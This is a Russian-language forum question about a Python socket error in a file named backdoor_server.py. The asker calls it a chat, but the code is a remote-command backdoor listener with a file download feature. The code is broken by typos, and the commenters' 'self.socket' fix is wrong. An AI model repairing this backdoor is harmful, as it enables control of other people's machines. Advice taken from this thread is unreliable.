# Проблема с socket

Tags: python-3.x, сокет

Делаю чат с помощью socket, но выходит ошибка:

```
Traceback (most recent call last):
  File "backdoor_server.py", line 48, in <module>
    my_listener = Listener("10.0.2.16", 4444)
  File "backdoor_server.py", line 7, in __init__
     listener.setsoсkopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
AttributeError: 'socket' object has no attribute 'setsoсkopt'
```

вот код сервера:

```
import socket
import json

class Listener:
    def __init__(self, ip, port):
        listener = socket.socket(socket.AF_INET, 
socket.SOCK_STREAM)
        listener.setsoсkopt(socket.SOL_SOCKET, 
socket.SO_REUSEADDR, 1)
        listener.bing((ip, port))
        listener.listen(0)
        print("[*] Ожидание соединения")
        self.connection, addres = listener.accept()
        print("[+] Соединение установлено с " + str(addres))

    def send(self, data):
        json_data = json.dumps(data)
        self.connection.send(json_data)

    def receive(self):
        json_data = ""
        while True:
            try:
                json_data = jason_data + 
self.connection.recv(1024)
                return json.loads(json_data)
            except ValueError:
                continue

    def execute_remotely(self, command):
        self.send(command)
        if command[0] == "exit()":
            self.connection.close()
            exit()
        return self.receive()

    def write_file(self, path, content):
        with open(path, "wb") as file:
            file.write(content)
            return "[*] Файл скачен"

    def run(self):
        while True:
            command = input(">> ")
            command = command.split(" ")
            result = self.execute_remotely(command)
            if command[0] == "download":
                result = self.write_file(command[1], content)
            print(result)

my_listener = Listener("10.0.2.16", 4444)
my_listener.run()
```

Comment: Не `socket`, а `self.socket`.

Comment: что то я не в дупляюсь

Comment: Там где вы пишете `socket`, нужно добавить `self`, что тут не понятного то? `self.socket.socket(self.socket.AF_INET...` и так далее...

Comment: Теперь другая ошибка; Traceback (most recent call last):
  File "backdoor_server.py", line 48, in <module>
    my_listener = Listener("10.0.2.16", 4444)
  File "backdoor_server.py", line 6, in __init__
    listener = self.socket.socket(self.socket.AF_INET, self.socket.SOCK_STREAM)
AttributeError: 'Listener' object has no attribute 'socket'

Comment: Видимо вам нужен дугой подход, изучите документацию https://docs.python.org/3/library/socket.html Тут и примеры есть.